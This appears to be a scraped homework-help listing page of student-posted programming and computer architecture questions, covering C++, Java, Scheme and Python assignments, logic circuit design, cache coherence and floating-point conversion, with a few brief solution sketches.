- Anonymous asked: Show by induction on the number of operator occurrences in a regular expression R, that R is equivalent to either the regular expression Ø, or some Ø-free regular expression.
1 answer
- Anonymous asked: This is my first year of C++ and I am having a lot of trouble figuring out this program involving functions. The program gives a menu of options and the user must choose one. I must do this with the functions given. I cannot figure this out and would appreciate it if someone could help me get on the right track. Here is the program:
this is the menu and functions
'A' Find if the sum of the two integers entered is even or odd
'B' Finds if the number entered is prime
'C' Finds the sum between two integers
'D' Asks for a year and tells if it is a leap year
'E' Displays the menu
'Q' Quits the program
functions:
void printMenu()
bool isEven (int,int)
bool isPrime (int)
bool sum(int)
bool leapYear(int)
Thanks for your help.
1 answer
- Anonymous asked: This is all I could get. Thanks.
Problem specification
Chris Johanson wants a program that calculates and displays a 10%,
15%, and 20% tip on his total restaurant bill. First, create an IPO chart
for this problem, and then desk-check the algorithm twice, using
$35.80 and $56.78 as the total bill. After desk-checking the algorithm,
list the input, processing, and output items in a chart.
IPO chart information C++ instruction
Input
Total bill double totalBill = 0.0;
Tip 10 percent double tipOne = 0.0;
Tip 15 percent double tipTwo = 0.0;
Tip 20 percent double tipThree = 0.0;
Processing
Total bill from restaurant double totalBill = 0.0;
Output
Tip double tip = 0.0;
Algorithm
1. Enter the total bill and tip percent
2. Calculate the total with tip one
3. Calculate the total with tip two
4. Calculate the total with tip three
5. Calculate the tip by multiplying the total bill with the tip percentage
6. Display the tip for each one.
0 answers
- Anonymous asked: Write a program that simulates a bank. The program will prompt the user asking if they want to run the program again. If yes, then start the program over. If no, then terminate the program.
The execution phase runs for 2 minutes, during which time customers will arrive randomly every 2 - 6 seconds and be placed into a queue. Each customer will have a property relating to the amount of time he/she wants to spend with a teller, which is to be randomly generated to be between 2 and 5 seconds.
There would be a maximum of 5 tellers to attend to the customers. When you start the simulation, each teller is occupied. You will need to generate a random time for each of the first 5 customers occupying the tellers at the beginning of the 2-minute simulation.
As they finish attending a customer (based upon the amount of time associated with each customer), that teller becomes available for the next customer in the queue. As a customer is removed from the queue and sent to an "available" teller, then their availability is set to "False". Customers are allocated to any one of the 5 tellers that becomes available, and so on... until the time of 2 minutes for the simulation is finished.
If after 2 minutes, there are still customers in the queue, we would discard them, but still count them in the total count of customers that visited the bank. Also add into the total count of customer the first five customers that the tellers started out with as well as to the individual teller's total.
Finally display on the screen (at the end of each execution):
The total amount of customers that visited the bank for that 2 minutes.
The total amount of customers that each teller helped.
The total amount of time that each teller was occupied.
The total amount of customers that did not get to see a teller.
1 answer
- AmusingMorning5095 asked: Write a program to compute miles per gallon for an automobile. Use a function to determine mpg. Pass data by value to the function.
Print results in main program .
Implementation:
Prompt user for previous odometer reading, new odometer reading, and gallons added to tank to fill.
(PLEASE I NEED IT IN C++, NOT IN C)
1 answer
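The computation itself is one subtraction and one division; a sketch of the requested pass-by-value function (Python standing in for the C++ assignment; parameter names are illustrative):

```python
def mpg(prev_odometer, new_odometer, gallons):
    """Miles per gallon; all arguments are passed by value, as the post requires."""
    return (new_odometer - prev_odometer) / gallons
```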
- Anonymous asked0 answers
- DiligentDragon7282 asked:
#include <stdio.h>
#include <stdlib.h>
#define ITERS 8
struct sf { struct sf * bp ;
void * ra ;
int p1 ;
int p2 ;
int p3 ;
} ;
int f(int i, int i2, int i3 ) {
struct sf * sf ;
if (i>0) f(i-1, i2+1, 0xdeadbeef ) ;
else {
int j = i2 ;
sf = &i-2 ; // what assumption am i making?
while ( j>0 ) {
printf("\naddr=%p\n bp=%p\n ra=%p\n params:\n p1=%d\n p2=%d\n p3=%#x\n",
sf, sf->bp, sf->ra, sf->p1, sf->p2, sf->p3 ) ;
sf = sf->bp ;
j-- ;
}
}
return 0 ;
}
int main(int argc, char * argv[]) {
f(ITERS, 0, 0xdeadbeef ) ;
return 0 ;
}
--------------------------
// What does this program print?
// Why does it print this?
// How does it accomplish it?
// What do the variable names "sf", "bp" and "ra" stand for?
0 answers
- MachoVacation6896 asked: Validate input using a do-while loop. Users can't enter negative numbers. Echo screen and output a f... 1 answer
- Anonymous asked: Hi! I've tried everything, but no success. I really need this within 30-40 minutes. Here's the code for finding the mode:
for(int a=0; a < pack.length; a++)
{
tempcounter = 0;
for(int k=0; k < pack.length; k++)
{
if(pack[a] == pack[k])
{
tempcounter++;
if(counter<tempcounter)
{
counter = tempcounter;
numoccured = pack[a];
}
}
}
}
***Just so you know, numoccured is the mode.
1 answer
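The posted nested loop does find the most frequent value, but updating counter inside the inner loop makes it hard to follow; an equivalent, tidier version of the same O(n²) scan (Python for brevity):

```python
def mode(pack):
    """Return the most frequent element of pack (first one found on ties)."""
    counter, numoccured = 0, None
    for a in pack:
        tempcounter = sum(1 for k in pack if k == a)  # count occurrences of a
        if tempcounter > counter:
            counter, numoccured = tempcounter, a
    return numoccured
```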
- Anonymous asked1 answer
- sosodef asked: How can I draw a histogram of 2-11 where each number's bar reaches up to the chain length of that number in a hailstone sequence?
1 answer
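The chain length is just the number of terms before the hailstone (Collatz) sequence reaches 1; a sketch of the length function and a simple text histogram (the bar character and layout are assumptions):

```python
def hailstone_length(n):
    """Number of terms in the hailstone sequence starting at n."""
    count = 1
    while n != 1:
        n = 3 * n + 1 if n % 2 else n // 2
        count += 1
    return count

def histogram(lo=2, hi=11):
    """One line per number, with a bar of '*' as long as its chain length."""
    return "\n".join(f"{n:2d} " + "*" * hailstone_length(n)
                     for n in range(lo, hi + 1))
```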
- SilkyBank6955 asked1 answer
- SilkyBank6955 asked1 answer
- Anonymous asked1 answer
- Anonymous asked: Consider a 4-drive, 200 GB-per-drive RAID array. What is the available data storage capacity for eac... 0 answers
- crimson25 asked: This is about how to use semaphores to synchronize multiple threads.
The program I have written, shown below, creates three threads: PrintA will be responsible for printing out A's, PrintB for B's, and PrintC for C's. I need you to add semaphores such that the program will repeatedly print out three A's followed by two B's, then a C. The following printout is a correct example: AAABBCAAABBCAAABBCAAABBC… You can only add semaphore-related statements. You cannot add others such as regular variables, control structures, or user-defined functions.
// project4.cpp : main project file.
#include "stdafx.h"
using namespace System;
using namespace System::Threading;
ref class PrintTasks
{
public: static bool runFlag = true;
public:
void PrintA(Object^ name) {
while (runFlag) {
Console::Write("{0}\n", "A");
}
}
void PrintB(Object^ name) {
while (runFlag) {
Console::Write("{0}\n", "B");
}
}
void PrintC(Object^ name) {
while (runFlag) {
Console::Write("{0}\n", "C");
}
}
};
int main(array<System::String ^> ^args)
{
PrintTasks ^tasks = gcnew PrintTasks();
// First Method
Thread ^thread1 = gcnew Thread ( gcnew ParameterizedThreadStart( tasks, &PrintTasks::PrintA ) );
Thread ^thread2 = gcnew Thread ( gcnew ParameterizedThreadStart( tasks, &PrintTasks::PrintB ) );
Thread ^thread3 = gcnew Thread ( gcnew ParameterizedThreadStart( tasks, &PrintTasks::PrintC ) );
thread1->Start("printA");
thread2->Start("printB");
thread3->Start("printC");
Thread::Sleep(50);
PrintTasks::runFlag=false;
thread3->Abort();
thread2->Abort();
thread1->Abort();
return 0;
}
0 answers
- Anonymous asked: To find:
The average of each column and row (up and down).
The averages diagonally; there should be 2 (across).
Please show the output by picture or by pasting here.
Thank you.
1 answer
- GroovyHorse7071 asked: Implement a magic square. A magic square is a square of numbers with N rows and N columns, in which each integer value from 1 to (N x N) appears exactly once, and the sum of each column, each row and each diagonal is the same value. For example, the figure below shows the magic square when N = 3.
You will create a square for an input value of N using the following algorithm:
- Insert the value 1 in the middle of the first row
- While the counter is less than or equal to N^2
- Place the next number (x + 1) in the position one row up and one row to the right, unless:
i.You move off the top in any column: If so, move to the bottom row
ii.You move off the right end: If so, move to the first column
iii.You move to a position already filled or out of the upper right corner: If so, move one row below where x was inserted
- Stop when you have placed as many elements as there are in the array
** SEE BELOW **
Start with the main function I have provided and add functionality to show each iteration after each new item is inserted.
Create two functions:
- populateArray: This function populates the array based on the algorithm above. After every new addition, call the printArray function
- printArray: This function takes in the current array (the numbers filled in so far and prints it out). If the number hasn’t been filled in yet, it should print an “X”
What you will turn in:
- Change the SIZE to be 3 and 9
- Show output using both sizes
****** ..................... **************** (PLEASE COMMENT YOUR CODE)
#include <iostream>
#include <math.h>
#define SIZE 3
using namespace std;
bool checkArray(int inputArray[][SIZE], int numRows, int numCols)
{
// Each row, column and diagonal should be equal to
// (1/SIZE) * Sum(1 through SIZE^2)
int correctAnswer = (int)((pow(SIZE, 4.0) + pow(SIZE, 2.0))/(2 * (SIZE)));
cout << "Looking for: " << correctAnswer << "\n";
for (int i = 0; i < numRows; i++)
{
int sumV = 0;
int sumH = 0;
// Scan row and column simultaneously
for (int j = 0; j < numCols; j++)
{
sumV = sumV + inputArray[j][i];
sumH = sumH + inputArray[i][j];
}
// Print out results for row and column
cout << "Sum for column " << i << ": " << sumV << "\n";
cout << "Sum for row " << i << ": " << sumH << "\n";
if (sumV != correctAnswer || sumH != correctAnswer)
return false;
}
int sumD1 = 0;
int sumD2 = 0;
for (int i = 0; i < numRows; i++)
{
sumD1 = sumD1 + inputArray[i][i];
sumD2 = sumD2 + inputArray[i][SIZE - i - 1];
}
cout << "Sum for diagonal 1: " << sumD1 << "\n";
cout << "Sum for diagonal 2: " << sumD2 << "\n";
if (sumD1 != correctAnswer || sumD2 != correctAnswer)
return false;
return true;
}
/////////////////////////////////////////
// Main function: Creates a magic
// square
//////////////////////////////////////
int main()
{
int counter = 0;
// Set the array to 0
int originalArray[SIZE][SIZE] = {0};
for (int i = 0; i < SIZE; i++)
{
for (int j = 0; j < SIZE; j++)
originalArray[i][j] = 0;
}
// Populate and print array
populateArray(originalArray, SIZE, SIZE);
// Checking to see if array is correct
if (checkArray(originalArray, SIZE, SIZE))
cout << "This is a magic square\n";
else
cout << "This is not a magic square\n";
return 0;
}
0 answers
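The placement rules in the post are the classic Siamese method, which fills magic squares of odd order (covering both required sizes, 3 and 9); a compact sketch of populateArray's core logic (Python stand-in; the per-step printing is omitted):

```python
def magic_square(n):
    """Siamese method for odd n: start mid-top, move up-and-right with
    wraparound, drop one row when the target cell is occupied."""
    grid = [[0] * n for _ in range(n)]
    row, col = 0, n // 2                      # value 1: middle of first row
    for x in range(1, n * n + 1):
        grid[row][col] = x
        r, c = (row - 1) % n, (col + 1) % n   # up-and-right, wrapping edges
        if grid[r][c]:                        # occupied: one row below x instead
            r, c = (row + 1) % n, col
        row, col = r, c
    return grid
```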
- Fusion asked: a) Write a recursive Java method that will accept a positive integer as an argument, returning the product of the digits in that integer.
b) Write a recursive Java method that will accept two positive integers as arguments, returning the product of those two integers.
c) Write a recursive Java method that will accept a string as an argument, returning whether that string is a palindrome. Recall, a palindrome is a string of characters that reads the same forwards or backwards (i.e. abba, 12321).
1 answer
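Language-neutral sketches of the three recursions (Python standing in for Java; the base cases are the key design choice in each):

```python
def digit_product(n):
    """(a) Product of the digits of a positive integer, recursively."""
    return n if n < 10 else (n % 10) * digit_product(n // 10)

def product(a, b):
    """(b) Product of two positive integers via repeated addition."""
    return 0 if b == 0 else a + product(a, b - 1)

def palindrome(s):
    """(c) True if s reads the same forwards and backwards."""
    return len(s) < 2 or (s[0] == s[-1] and palindrome(s[1:-1]))
```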
- DashingTriangle9176 asked: Write a program to read in 5 integers and store them in an array. Find and display the minimum value... 1 answer
- Anonymous asked: Let's define a zipper as a proper list where each element is a list with exactly two elements which can be any expressions. Write a function zipper? that returns #t if its single argument is a zipper and #f if it is not. Write a function zip that takes two proper lists and creates a zipper out of them, pairing up elements from the first and second arguments. If either of the two lists is shorter than the other, use null for the missing elements. Write a function unzip that reverses the process, taking a zipper and returning a list of two lists. Some examples should make this clear.
> (zipper? '((a 1)(b 2)))
#t
> (zipper? '((foo 100)(bar 2 3)))
#f
> (zipper? '((a 1) b (c 3)))
#f
> (zipper? '((a 1) . 2))
#f
> (zip '(a b c) '(1 2 3))
((a 1) (b 2) (c 3))
> (zip '(a b c) '(1))
((a 1) (b ()) (c ()))
> (zip '(a b) '(1 2 3))
((a 1) (b 2) (() 3))
> (zip '() '())
()
> (unzip '((a 1)(b 2)(c 3)))
((a b c) (1 2 3))
> (unzip '())
(() ())
0 answers
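The same pairing/unpairing logic, sketched in Python with [] standing in for Scheme's null:

```python
def zip2(a, b):
    """Pair up elements of a and b; pad the shorter list with []."""
    pad = lambda xs, i: xs[i] if i < len(xs) else []
    return [[pad(a, i), pad(b, i)] for i in range(max(len(a), len(b)))]

def unzip(z):
    """Reverse zip2: a zipper becomes a list of two lists."""
    return [[p[0] for p in z], [p[1] for p in z]]
```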
- TeamHeat123 asked: Write a class called Temperature that represents temperatures in degrees in both Celsius and Fahrenheit. Use a floating-point number for the temperature and an enum for the scale with either ‘C’ for Celsius or ‘F’ for Fahrenheit.
It will have four constructors: one for the number of degrees, one for the scale, one for both the degrees and the scale, and a default constructor. For each of these constructors, assume zero degrees if no value is specified and Celsius if no scale is given.
It will have two accessor methods: one to return the temperature in degrees Celsius, the other to return it in degrees Fahrenheit. (Use the formulas from the Programming Project 5 of Chapter 3 and round to the nearest tenth of a degree.)
It will have three mutator methods: one to set the number of degrees, one to set the scale, and one to set both.
It will have three comparison (boolean) methods: one to test whether two temperature objects are equal, one to test whether one temperature is greater than another, and one to test whether one temperature is less than another.
Write a separate driver program called TemperatureDriver that tests all of the above methods. Be sure to invoke each of the constructors, to include at least one true and one false case for each of the different comparison methods, and to test at least the following three temperature pairs for equality: 0.0 degrees C and 32.0 degrees F, -40.0 degrees C and -40.0 degrees F, and 100.0 degrees C and 212.0 degrees F.
I need all of this done in the exact way it is asked to get full credit. Thank You!!!
1 answer
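The three equality pairs in the driver all follow from the standard conversion formulas, rounded to the nearest tenth as the accessors require; a sketch of just the conversions (Python standing in for the Java class):

```python
def c_to_f(celsius):
    """Celsius -> Fahrenheit, rounded to the nearest tenth of a degree."""
    return round(celsius * 9 / 5 + 32, 1)

def f_to_c(fahrenheit):
    """Fahrenheit -> Celsius, rounded to the nearest tenth of a degree."""
    return round((fahrenheit - 32) * 5 / 9, 1)
```

So 0.0 C pairs with 32.0 F, -40.0 C with -40.0 F, and 100.0 C with 212.0 F, exactly the three pairs the driver must report as equal.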
- Anonymous asked0 answers
- Anonymous asked“Commonly it considered that degree of multiprogramming is affecting CPU utilization and always in... More »1 answer
- Anonymous asked: Write a program in C language and run it in a Linux environment that displays the following results:
1. Display the Process ID of the Parent processes
2. Then execute a fork() call
3. If call is successful on fork( ) execution then display the process identifier of the Child process which returned to the Parent process Or Display the Process ID of Child process
4. Show that Process ID of the Parent process does not change before and after fork() call.
5. Child process display a message “I AM CHILD PROCESS”
6. Parent process display a message “I AM PARENT PROCESS”
0 answers
- Anonymous asked: Write a menu-driven mini-statistics package. A user should be able to enter up to 200 items of float... Write <EOF> when you are done with data input.
Item #1 : 25
Item #2 : 36
Item #3 : 27.5
Item #4 : 28
Item #5 : 32
Item #6 : 33.25
Item #7 : <EOF>
This program will perform the following:
1) Enter data.
2) Display the data and the following statistics:
the number of data items, the high and low values in the data, the mean, median, mode, variance and standard deviation.
3) Quit the Program
2 answers
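The statistics behind menu option 2 can be sketched in a few lines (population variance is an assumption; the assignment may instead want the sample variance with n - 1):

```python
def stats(data):
    """High, low, mean, median, mode, variance, and standard deviation."""
    n = len(data)
    mean = sum(data) / n
    s = sorted(data)
    median = s[n // 2] if n % 2 else (s[n // 2 - 1] + s[n // 2]) / 2
    mode = max(s, key=s.count)                          # first max on ties
    variance = sum((x - mean) ** 2 for x in data) / n   # population variance
    return {"n": n, "high": max(data), "low": min(data),
            "mean": mean, "median": median, "mode": mode,
            "variance": variance, "stddev": variance ** 0.5}
```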
- Anonymous asked0 answers
- Anonymous asked0 answers
- Anonymous asked: Problem:
Write a main method, based on the method calls given, that prints six numbers from array list1 in reverse.
The array list is: 1 2 3 4 5 6 The reverse array list is: 6 5 4 3 2 1
Use the following in the program:
public static int[] reverse(int[] list) {
int[] result = new int[list.length];
for (int i = 0, j = result.length - 1;
i < list.length; i++, j--) {
result[j] = list[i];
}
return result;
}
int[] list1 = new int[]{1, 2, 3, 4, 5, 6};
int[] list2 = reverse(list1);
1 answer
- Anonymous asked:
// Correct the errors in this program
// Find the total result of 10 numbers
public class SumArray_2
{
public static void main(String args[])
{
int[] arrayName;
arrayName = new int [10];
// add each element's value to total
for (int counter = 0; counter < arrayName.length; counter++)
total += arrayName[ counter ];
System.out.printf("Total of arrayName elements: %d\n");
} // end main
} // end of class InitArray2
1 answer
- Anonymous asked: Design the logic for a program that allows a user to enter 10 numbers, then displays them in the reverse order of their entry.
(Write Python code for this program and run it to make sure it works.)
1 answer
- Anonymous asked: The Midville Park District maintains five soccer teams, as shown in the table. Design a program that accepts a player's team number and displays the player's team name.
_____________________________
Team number Team name
______________________________
1 Goal Getters
2 The Force
3 Top Guns
4 Shooting Stars
5 Midfield Monsters
(Write Python code and run it.)
1 answer
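Since the question asks for runnable Python, the table is naturally a dictionary lookup (the fallback message for an invalid number is an assumption):

```python
TEAMS = {1: "Goal Getters", 2: "The Force", 3: "Top Guns",
         4: "Shooting Stars", 5: "Midfield Monsters"}

def team_name(number):
    """Return the team name for a player's team number."""
    return TEAMS.get(number, "Unknown team number")
```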
- Anonymous asked: Write a C++ program to solve the following problem
Given: a set of data
File name: data
1st line: number of additional lines of data
Additional lines: 5 measurement on each line:
length, width, height, fraction, weight
Each line contains data for one item produced on an assembly line.
The 3 size measurements can be used to determine the size of a box (box volume) that will hold each item.
The "fraction" value is the percent of the "box volume" that is the actual volume of the item.
Compute and print the item with the largest box volume.
0 answers
- Anonymous asked:
A 4-core system with central memory with MOSI (Modified, Owned, Shared, Invalid) flags and write-back
policy, has cache that contains 4 blocks each and each block is 4 decimal digits. The four caches look like
the following:
Cache P0
Block Flag Tag Data
B00 I 104 1234
B01 O 108 5678
B02 S 112 2468
B03 S 120 1357
Cache P1
Block Flag Tag Data
B00 M 100 1235
B01 O 116 5679
B02 I 112 4321
B03 S 120 1357
Cache P2
Block Flag Tag Data
B00 I 100 1234
B01 O 104 5678
B02 I 116 2468
B03 S 122 8765
Cache P3
Block Flag Tag Data
B00 S 104 5678
B01 S 108 5678
B02 S 112 2468
B03 S 122 8765
(1) Assume snooping protocol. Show the contents of the memory for the blocks addressed as 100, 104,
..., 122, 124. If the contents cannot be determined by the above cache images, assume they are
equal to the last four bits of your student number.
(2) Assume directory protocol. Show the contents of the directory for this memory.
(3) How does the memory look after P0 executes an atomic increment on the leftmost (decimal) byte of
122? The first invalid entry is the victim.
(4) How does the directory look after this operation?
0 answers
- Anonymous asked:
C. Modify the movie-rating program so that the user is prompted continuously for a movie title until ZZZZZ is entered. Then, for each movie, continuously accept star-rating values until a negative number is entered. Display the average rating for each movie.
0 answers
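The nested sentinel loops described here can be sketched as follows; average_ratings is a hypothetical helper, and tokens stands in for the stream of interactive entries:

```python
def average_ratings(tokens):
    # tokens is the user's entry stream: a movie title, then star ratings
    # until a negative number, repeating until the sentinel title ZZZZZ.
    it = iter(tokens)
    results = {}
    for title in it:
        if title == "ZZZZZ":
            break
        total = count = 0
        for tok in it:
            rating = float(tok)
            if rating < 0:      # inner sentinel: negative rating ends this movie
                break
            total += rating
            count += 1
        results[title] = total / count if count else 0.0
    return results

print(average_ratings(["Jaws", "4", "5", "-1", "ZZZZZ"]))
```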
- flowers89 asked:
Using Functions and Arrays
Write a C++ program that calculates and displays the total travel
expenses of a business trip. The user must provide the following information:
• Number of days spent on the trip.
• The departure on the first day of the trip, and the time of arrival back home on the
last day of the trip. The departure and arrival time must be entered in 12h or 24h
formats. Your program should consider AM and PM.
• Amount of airfare, if any
• Amount of car rentals, if any
• Miles driven, if a private vehicle was used
• Parking Fees, if a rental or private vehicle was used
• Amount of taxi charges, if any
• Conferences or seminars registration fees, if any
• Lodging charges per night
• The amount of meals eaten
The company reimburses travel expenses according to the following policy:
• Up to $37.00 per day for meals. The company allows up to $ 9 for breakfast, $ 12
for lunch, and $ 16 for dinner per day. On the first day of the trip, breakfast is
allowed as an expense if the time of departure is before 7 AM. Lunch is allowed if
the time of departure is before 12 noon. Dinner is allowed on the first day if the
time of departure is before 6 PM. On the last day of the trip, breakfast is allowed
if the time of arrival is after 8 AM. Lunch is allowed if the time of arrival is after
1 PM. Dinner is allowed on the last day if the time of arrival is after 7 PM.
Anything in excess of this must be paid by the employee. It is not necessary to
reimburse the company for any savings on meals; savings can be subtracted from the
amount that must be reimbursed to the company. The following table
summarizes this point.
- Parking fees, up to $10.00 per day
- Taxi charges up to $20.00 per day
- Rent a car fees, up to $45.00 per day
- Lodging charges up to $95.00 per day
- If a private vehicle is used, $0.27 per mile driven
- Conference or seminars fees up to $2,500
- Amount of airfare
The program should calculate and display the following:
- Total expenses incurred by the business person
- The total allowable expenses for the trip
- The excess for that must be paid by the business person, if any
- The amount saved by the business person if the expenses were under the total allowed.
The program should have the following functions:
CalcMeals ( ) Calculate and returns the amount reimbursed for meals.
CalcMileage ( ) Calculate and returns the amount reimbursed for mileage driven in
a private vehicle.
CalcParkingFees ( ) Calculate and returns the amount reimbursed for parking fees.
CalcTaxiFees ( ) Calculate and returns the amount reimbursed for taxi charges.
CalcLodging ( ) Calculate and returns the amount reimbursed for lodging.
CalcTotalReimbursement ( ) Calculate and returns the total amount reimbursed.
CalcUnallowed ( ) Calculate and returns the total amount of expenses that are not
allowable, if any.
CalcSaved ( ) Calculate and returns the total amount of expenses under the
allowable amount, if any. For example, the allowable amount for
lodging is $95.00 per night. If a business person stayed in a hotel
for $85.00 per day for 3 nights, the savings would be $ 30.00.
IVPos ( ) Do not accept negative numbers for any dollar amount or for miles
driven in a private vehicle. This function returns a value greater than or
equal to zero.
IVDays ( ) Do not accept numbers less than 1 for the number of days.
2 answers
- Anonymous asked:
Congratulations! You've been hired by the Fly-By-Night Engineering Company. Your new supervisor asks you to write a C++ program that will manage a list of domain names and IP numbers stored in an array of structs. This program will give you practice inputting data from files, writing and calling functions, using arrays and outputting data to a file. You should only use one array of structs.
The infotype in this problem will consist of an Internet domain name (string), an IP number (string) and a counter (int). New entries are added to the end of the array. Whenever an item is accessed by the F(ind) or M(odify) command, its counter is incremented by one.
Prompt the user to input the name of the data file. (3 pts) The input contains lines of the following format:
<command> < data for processing the command>
commands are: A, M, D, F, P, Q
//----------------------------------------------------------------------------------------------------------------
A (insert) will be followed by a domain name and IP number
A: (10 pts) Add an entry with the domain name, IP number, and zero counter to the end of the array
//----------------------------------------------------------------------------------------------------------------
M (modify) will be followed by a domain name and a new IP number
M: ( 10 pts) Changes the IP number for the indicated domain name. Increment the counter.
//----------------------------------------------------------------------------------------------------------------
D (delete ) will be followed by the name to delete from the array
D: (8 pts) deletes the entry with the indicated domain name from the array
//----------------------------------------------------------------------------------------------------------------
F (find) will be followed by a domain name to find in the list
F: (8 pts) print out the IP number for the indicated domain name. Increment the counter.
//----------------------------------------------------------------------------------------------------------------
P (print) will have no additional data
P: (5 pts) Print the contents of the array; print domain name, IP number, counter for each entry
//----------------------------------------------------------------------------------------------------------------
Q (quit) will have no additional data.
Q: (16 pts) stop processing; do the following:
Use Selection sort to sort the array in order by domain name.
Print the sorted list to the screen.
Prompt the user to input a top level domain ( for example edu ) Print a list of all list entries from that domain to the screen. (Allow multiple entries)
Print the list entry with the largest counter to the screen. (this was the most popular web site)
Print the sorted list to an output file. Make sure to include your name and lab CRN in the output file.
Name the output file with your first and last name
Notes:
1. Remember to review the grading algorithm.
2. Save a copy of the file you hand in. Make sure to leave the file unchanged after your submission until you receive a grade on the project assignment.
3. Sample data one.txt, two.txt, and three.txt ,try.txt
4. Print a message if the domain name being searched for is not in the array.(modify, change, delete)
5. Do not use global variables; pass parameters.
6. You should use functions to accomplish each task. You must have at least five functions.
7. Make sure that your output has a heading and is labeled.
8.Use function prototypes; function definitions should be after the main.
9. Name your source code file using your last name and first initial as follows: lastname_firstInitial_Prj4.cpp
For example Stewie Griffin would save his source code in a file name Griffin_S_Prj4.cpp
10. Echo print the data input from each line.
11. This program will have many lines of output. You should count the lines of output and use an if similar to the following to allow the user to see all of the output.
if ( lines % 20 == 0)
{
cout << "enter a character to continue ";
cin >> it;
}
12. A small sample input file follows on the next page. A sample output follows on the last page. NOTICE that the sample output is not complete; it does not perform the tasks required when the Q command is encountered.
0 answers
- Anonymous asked:
Analyze and draw a "Cross Reference Matrix" to identify/show different reports and attributes, …
0 answers
- Anonymous asked:
Give the hexadecimal memory representation for the real number 127.9375 stored in a single-precision 32-bit floating point variable. Show your work for each step.
i. Integer & Decimal/Fractional Portion Conversions
ii. Normalized Binary Representation for the Integer & Decimal
Portions Together
iii. Conversion from above to Sign, Exponent, Mantissa portions
(1bit, 8 bit, 23 bits respectively)
iv. Conversion from Binary to Hex
1 answer
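The hand conversion can be cross-checked mechanically; this Python sketch packs the value as IEEE-754 single precision and shows the resulting bytes:

```python
import struct

def float32_hex(x):
    # Pack as big-endian IEEE-754 single precision, then show the bytes.
    return struct.pack(">f", x).hex().upper()

# 127.9375 = 1111111.1111 (binary) = 1.111111111110...0 x 2^6
# sign 0, exponent 6 + 127 = 133 = 10000101, mantissa 11111111111000...0
print(float32_hex(127.9375))  # 42FFE000
```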
- Anonymous asked:
I am having a problem with finding a state diagram for a PDA that accepts {ww : w ∈ {a,b}*}.
I read somewhere that I need a two-stack PDA or something. A JFLAP diagram would be a great help.
Thanks.
0 answers
- Anonymous asked:
1. A combinational circuit produces the binary multiplication of two unsigned 2-bit numbers, x1x0 an…
0 answers
- Anonymous asked:
Draw the NAND logic diagram for the following expression using a multiple-level NAND gate circuit:
F(A,B,C,D,E) =AB’ + C’D’ + BC’ (A + B)
Note: B’ means B bar, B not. Same as C’ and D’. • Show less2 answers
- Anonymous asked:
Construct a 3x8 decoder.
a) Provide a truth table of the combinational circuit.
b) Write the Boolean equations.
c) Simplify the Boolean equations.
d) Draw the logic diagram.
1 answer
- Anonymous asked:
Construct a 4x1 input multiplexer.
a) Provide a truth table of the combinational circuit.
b) Write the Boolean equations.
c) Simplify the Boolean equations.
d) Draw the logic diagram.
2 answers
- Anonymous asked:
Design a 4-input priority encoder with four inputs D0, D1, D2, and D3, with input D0 having the high…
1 answer
- Anonymous asked:
Construct an 8x1 multiplexer with two 4x1 and one 2x1 multiplexers. Use block diagrams for the three…
1 answer
- ngansoplili asked:
Assume you have a project with seven activities labeled A-G, as shown. Derive the earliest completion time (early finish, EF), the latest completion time (late finish, LF), and the slack for each of the following tasks (begin at time = 0). Which tasks are on the critical path? Draw a Gantt chart for these tasks.
Task  Preceding  Expected duration  EF  LF  Slack  Critical path?
A _ 5
B A 3
C A 4
D C 6
E B,C 4
F D 1
G D,E,F 5
1 answer
- Anonymous asked:
Use this 2-dimensional array to represent a maze:
static char maze[][] =
{ { '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#' },
{ '#', '.', '.', '.', '#', '.', '.', '.', '.', '.', '.', '#' },
{ '.', '.', '#', '.', '#', '.', '#', '#', '#', '#', '.', '#' },
{ '#', '#', '#', '.', '#', '.', '.', '.', '.', '#', '.', '#' },
{ '#', '.', '.', '.', '.', '#', '#', '#', '.', '#', '.', '.' },
{ '#', '#', '#', '#', '.', '#', '.', '#', '.', '#', '.', '#' },
{ '#', '.', '.', '#', '.', '#', '.', '#', '.', '#', '.', '#' },
{ '#', '#', '.', '#', '.', '#', '.', '#', '.', '#', '.', '#' },
{ '#', '.', '.', '.', '.', '.', '.', '.', '.', '#', '.', '#' },
{ '#', '#', '#', '#', '#', '#', '.', '#', '#', '#', '.', '#' },
{ '#', '.', '.', '.', '.', '.', '.', '#', '.', '.', '.', '#' },
{ '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#' } };
The #'s represent the walls of the maze, and the dots represent locations in the possible paths through the maze. A move can be made only to a location in the array that contains a dot.
Write a recursive method to walk through the maze. The method should receive as arguments a 12-by-12 character array representing the maze and the current location in the maze. The first time the method is called, the current location should be the entry point of the maze. As the method attempts to locate the exit, it should place the character 'x' in each square in its path.
There's a simple algorithm for walking through a maze that guarantees finding an exit (if there is one). If there is no exit, you will arrive at the starting location again.
The algorithm is as follows: From the current location in the maze, try to move one space in any possible direction (down, right, up, or left). If it's possible to move in at least one direction, call the method recursively, passing the new spot on the maze as the current spot. If it's not possible to go in any direction, back up to the previous location in the maze and try a new direction from that location. This is an example of recursive backtracking.
Program the method to display the maze after each move so the user can watch as the maze is solved. The final output of the maze should display only the path needed to solve the maze. If going in a particular direction results in a dead end, the x's going in that direction should not be displayed. To display only the final path, you could mark off spots that result in a dead end with another character (perhaps '0') - or you could just let the original dots be there. Just don't leave x's in dead end paths.
The user should be shown the maze each step of the way, showing the next step of progress and asking if they want to continue (y or n). When you hit a dead end, you do not have to back out step by step, but simply move back to the place the wrong move was made and continue from there. Remember that the dead-end path should not contain x's.
1 answer
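The recursive backtracking described above can be sketched compactly. The assignment asks for Java on the 12x12 maze with step-by-step display; this Python sketch on a smaller grid shows only the core recursion, using 'x' for the path and '0' for dead ends as the question suggests:

```python
def solve(maze, row, col):
    # Recursive backtracking: mark the current cell, try each of the four
    # directions, and re-mark dead ends with '0' so only the final path
    # keeps its 'x' marks.
    if row < 0 or row >= len(maze) or col < 0 or col >= len(maze[0]):
        return True   # stepped outside the grid: found the exit
    if maze[row][col] != '.':
        return False  # wall, or a cell already visited
    maze[row][col] = 'x'
    for dr, dc in ((1, 0), (0, 1), (-1, 0), (0, -1)):  # down, right, up, left
        if solve(maze, row + dr, col + dc):
            return True
    maze[row][col] = '0'  # dead end: erase the x
    return False

grid = [list(r) for r in ["#.###",   # exit above (0,1)
                          "#...#",
                          "#.#.#",
                          "....#",   # entry at the left edge, (3,0)
                          "#####"]]
grid[3][0] = 'x'        # mark the entry square so we don't walk back out
solve(grid, 3, 1)       # start just inside the entrance
print("\n".join("".join(r) for r in grid))
```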
